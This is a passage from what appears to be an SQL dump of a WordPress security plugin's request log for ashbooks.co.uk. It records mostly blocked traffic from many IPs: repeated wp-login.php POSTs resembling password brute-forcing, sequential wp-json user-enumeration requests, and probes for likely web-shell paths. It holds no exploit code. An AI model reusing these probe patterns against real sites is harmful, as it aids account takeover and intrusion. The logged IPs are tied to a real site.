Safari\\/537.36\"}','gP1ukdtZxvQVTH4L6N0r7wjC',0,1637852250.9684,524,'','POST',403,0,600,0,1,'',0),('159.65.238.248',2671898360,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','6kKYCBGPh2f1WTqnsEmSRF7H',0,1637853295.7175,496,'','POST',403,0,600,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','w8tGHnfyUalvWCV2jukpBJEX',0,1637853884.9150,170,'','GET',403,0,520,0,1,'',0),('167.114.144.40',2809303080,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','8DcXZKWtPxdmwiHqAkuRpLzN',0,1637854408.7710,500,'','POST',403,0,600,0,1,'',0),('128.199.220.215',2160581847,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','GXdNqV9gms5kzMO20EwYnRjI',0,1637855411.3875,458,'','POST',403,0,600,0,1,'',0),('161.35.15.239',2703429615,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','TINMPcmHq0uSkRiznK5wAet6',0,1637856600.6089,459,'','POST',403,0,600,0,1,'',0),('209.97.162.248',3512836856,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','1XKQpga2SWF45TYVHuc0Nofr',0,1637857770.4338,420,'','POST',403,0,600,0,1,'',0),('23.88.38.58',391652922,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','lHmwvVkbo1fsNIYM0AZFyEXh',0,1637859041.7533,491,'','POST',403,0,600,0,1,'',0),('166.62.125.246',2789113334,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','BnwdFNv7AjirXDp0IxYtV42q',0,1637860500.3238,424,'','POST',403,0,600,0,1,'',0),('161.35.94.99',2703449699,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','6vJG2gPZM5TIr1VYbeNKWcQm',0,1637861519.4103,156,'','POST',403,0,600,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-json/wp/v2/users/1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','7d9qnLiN8XvhcwRBYySQOpDu',0,1637861519.4644,146,'','GET',403,0,520,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-json/wp/v2/users/2','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','JmPKg29w6on1tkuh3l5dj04r',0,1637861519.6935,154,'','GET',403,0,520,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-json/wp/v2/users/3','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','JOHMzvPNtqWwxV23IE9X8Zas',0,1637861519.9336,142,'','GET',403,0,520,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','q0UJeGN9yCYWi5bnmZlEsXhH',0,1637861520.5085,393,'','POST',403,0,600,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','UHeZhpiGkBo8QY9l4SVbsCwL',0,1637861521.1698,366,'','POST',403,0,600,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','7LvmQefNMxlRnHszAXrVj62y',0,1637861521.9485,374,'','POST',403,0,600,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','LNTj2nvF9mHYlxwqPkr3QOaz',0,1637861522.5856,149,'','POST',403,0,600,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','HzWw6SgkpuDAdCf4yQlKBnMv',0,1637861522.9743,405,'','POST',403,0,600,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','P8KpSoJONm92hc541XV0Bt6z',0,1637861523.6795,145,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','FRdjLkugH6NnwvC3ptmTZ059',0,1637861524.9611,647,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','7PkO3elAMf81qRFQw4xUyn9D',0,1637861526.3674,358,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','VfetY02obriLlI9wdXWZGqT8',0,1637861526.9946,364,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','WfcZyYhVs17LNtqjxdMRQrzp',0,1637861527.6314,138,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','TGerSOEHmLX1pKVhw9ANYRox',0,1637861528.0681,368,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','2fpHxeRkmbj4ENTODZU3FLi8',0,1637861528.7284,122,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Zdi2gYNjzGQPE40Sk7R6Vt8H',0,1637861529.1051,366,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','lbJXEQYLw4CoUzkRa0xPv3r2',0,1637861529.7396,131,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','JgaPhdNACHvpSc9Ln2efRxIs',0,1637861530.1644,404,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','lxUhabNWfqOspXETcKig8VF6',0,1637861530.8578,154,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Bolpgt0kQjLJ7mYM2UENFIei',0,1637861531.3103,131,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','Ea0DNG273gbvowOX9FnekRBI',0,1637861531.7559,167,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','ryWGXC9E1w2ukQqRozptalYh',0,1637861532.2112,376,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','VbYr7ktOKqlSLApHJ43Wdi6u',0,1637861532.8551,130,'','POST',404,0,700,0,1,'',0),('162.250.127.234',2734325738,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/28.0.1468.0 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\"}','0dMI6a7RWhl3mOYDuFGBpjJz',0,1637861533.2642,358,'','POST',404,0,700,0,1,'',0),('20.151.104.89',345466969,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/95.0.4638.69 Safari\\/537.36\"}','6KIkVpMRhLPAcinmvxYfstWZ',0,1637863323.1340,305,'','GET',403,0,520,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','lnVKLpqjRY1IAwW6t9mUeOfb',0,1637863628.7161,174,'','POST',403,0,600,0,1,'',0),('47.242.19.52',804393780,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','JVgIEZiwBaW3GMtouNRr7pxc',0,1637864010.1379,741,'','POST',403,0,600,0,1,'',0),('155.94.163.77',2606670669,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','7EeiHtDBWnxyOI0FbrhzuvpA',0,1637866389.5589,476,'','POST',403,0,600,0,1,'',0),('23.94.120.151',392067223,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','1hlFVBGSnYukwErgLC0sxTMf',0,1637867855.2319,482,'','POST',403,0,600,0,1,'',0),('111.231.4.211',1877411027,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','AQ8c2riKxfMFpy5VWksuqmTa',0,1637869179.7231,485,'','POST',403,0,600,0,1,'',0),('144.76.102.246',2420926198,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','xSGIHNa6uVRjLW7gYXbFtJOE',0,1637870397.0560,499,'','POST',403,0,600,0,1,'',0),('133.130.103.36',2239915812,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','X4tqa2ZFSAr9gWfoMevz0PQ5',0,1637871778.0250,444,'','POST',403,0,600,0,1,'',0),('95.217.3.203',1608057803,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','CNX3BVF59LwaJ10eQ8boukZA',0,1637872809.3231,482,'','POST',403,0,600,0,1,'',0),('1.15.144.23',17797143,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','ac6TztbIPeiCAhLywMuR7ES4',0,1637873816.5261,486,'','POST',403,0,600,0,1,'',0),('188.166.1.143',3164995983,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','wosGk5K8W7jU3LfzplDQytxI',0,1637876154.6874,452,'','POST',403,0,600,0,1,'',0),('106.52.171.211',1781836755,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','ylJc6POBj5qeRKpgEAoDIFYd',0,1637877146.7377,483,'','POST',403,0,600,0,1,'',0),('194.6.208.106',3255226474,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','0xwBJe3gV6k9GNSEZqLWf58m',0,1637878317.0796,432,'','POST',403,0,600,0,1,'',0),('217.9.143.94',3641282398,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','kzNXPY84Kv0UWniJB91Z2GHt',0,1637879392.8831,426,'','POST',403,0,600,0,1,'',0),('69.30.240.26',1159655450,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','2otwGXrRpJfuLE0zg98MKDxF',0,1637879683.5106,396,'','POST',403,0,600,0,1,'',0),('167.86.118.101',2807461477,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','co4ETR8ICWgyuL2BPknGAt07',0,1637881809.0602,481,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp-includes/Requests/Exception/HTTP/512.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.012; !en.support.wordpress.com; !support.wordpress.com; support.wordpress.com; en.support.wordpress.com) Gecko\\/20120121 Firefox\\/40.0\"}','vpjB0ZfhNU19GL56dknrAHzX',0,1637882722.0131,404,'','GET',403,0,700,0,1,'',0),('157.245.95.172',2650103724,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','m5LcO4vNJnxBkoS2sFPHGq8E',0,1637883040.2651,528,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','2RbTs38M9qK71iXFg5u0QUSY',0,1637884291.6128,458,'','POST',403,0,600,0,1,'',0),('194.6.208.106',3255226474,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','TOr4ZQWsgY3oGj1qlANMBS7R',0,1637885535.8454,522,'','POST',403,0,600,0,1,'',0),('95.216.221.91',1608047963,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','mBDJdUQrMvY206btF95Sl1o8',0,1637886531.8632,973,'','POST',403,0,600,0,1,'',0),('52.163.223.126',883154814,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','b2SMoqUlzLcCJ09HsrX4Wn7h',0,1637887537.3523,494,'','POST',403,0,600,0,1,'',0),('116.255.160.108',1962909804,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','ZsU0z4jSbGAotdQTrayMX6p7',0,1637888640.3560,472,'','POST',403,0,600,0,1,'',0),('208.113.160.8',3497107464,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','wjBlDyfVcbk0u9RdFHvzm1Se',0,1637890131.7807,532,'','POST',403,0,600,0,1,'',0),('178.151.64.197',2996256965,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','MEmTrXoWNt9J7ezqQACvydfj',0,1637892698.7476,542,'','POST',403,0,600,0,1,'',0),('69.30.231.155',1159653275,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','8qr0R6QMA5JzWefUmZCOLEdw',0,1637893449.4801,5540,'','POST',403,0,600,0,1,'',0),('173.236.184.125',2917972093,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','STkCrGsbNyog3ch9e1qnpF2L',0,1637893767.1912,746,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2226.0 Safari\\/537.36\"}','yCPBg8UZlH9FaN2dOsvj3GMk',0,1637895974.5178,453,'','POST',403,0,600,0,1,'',0),('47.241.15.39',804327207,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','jI93SHh1rL2YqyvzK8clMaRf',0,1637897083.7934,522,'','POST',403,0,600,0,1,'',0),('116.203.177.233',1959506409,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','hOHNBSwuLp16GVfatjZseITC',0,1637898124.4332,211,'','POST',403,0,600,0,1,'',0),('93.104.211.150',1567150998,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','fy7kouVQN0IzCiwrXWl6batR',0,1637899115.8386,556,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','ZQKSa2XjF8GhsbD9CkpEUH4e',0,1637900278.2017,406,'','POST',403,0,700,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','SJ9RvGhEMeo6KQ52gUkCWdzu',0,1637900335.9624,463,'','POST',403,0,600,0,1,'',0),('198.252.110.1',3338432001,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','z0mgutGroH74pXFZC2MWPYjT',0,1637900388.0611,417,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','YKViW8ThaqAtHBMfQgrwCkDL',0,1637901586.5845,493,'','POST',403,0,600,0,1,'',0),('88.198.22.11',1489376779,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','9v0Vk6IpYwtn5QsjHWlqG1Cy',0,1637902638.4674,579,'','POST',403,0,600,0,1,'',0),('207.244.233.113',3488934257,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','6Jxn2B7pAMCGdob1DZ8wElaK',0,1637903788.9993,466,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','pT8Xh5xQBWH4e2f0r63cMVas',0,1637904694.2444,1683,'','POST',403,0,600,0,1,'',0),('74.208.25.176',1255152048,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','Itzp2WPqfDdr6s4obLgOhkZG',0,1637904809.9451,543,'','POST',403,0,600,0,1,'',0),('69.163.232.79',1168369743,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','3P2UR6VlJsardA9htXT84GY5',0,1637905825.8063,482,'','POST',403,0,600,0,1,'',0),('165.227.170.189',2783161021,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','cYQHBX68JqjlLMrf9KRWsFpx',0,1637907077.1688,495,'','POST',403,0,600,0,1,'',0),('23.88.38.58',391652922,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','nkTN5ASz0lR1jLf4tUbZEmCe',0,1637908113.6762,1488,'','POST',403,0,600,0,1,'',0),('192.187.118.202',3233511114,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','I5sT1W7CU8zlf6S4YHeOVpgy',0,1637908179.6056,154,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','EribAySCZ1UjdR0aTKW4fcG3',0,1637909059.1991,525,'','POST',403,0,600,0,1,'',0),('185.243.55.192',3119724480,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 